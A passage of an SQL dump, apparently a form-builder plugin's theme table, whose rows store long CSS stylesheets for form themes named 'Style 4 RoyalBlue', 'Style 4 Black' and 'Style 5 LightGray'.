\nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E7E7E7 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nspan.wdform_page_button\n{\ncolor:#5EA3CC !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.wdform_page_navigation\n{\nmargin-left: 6px !important;\nmargin-right: 4px !important;\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(26, 'Style 4 RoyalBlue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#5EA3CC !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#EB3D00 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #5EA3CC !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #5EA3CC !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#5EA3CC !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#E03B01 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #5EA3CC !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E03B01 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(27, 'Style 4 Black', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#EB3D00 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#E03B01 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #000000 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E03B01 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(28, 'Style 5 LightGray', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left !important;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:center;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit !important;\n		padding-right:inherit !important;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#E0DEE1!important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#C9C9C9 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#84857D !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#E0DEE1 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px 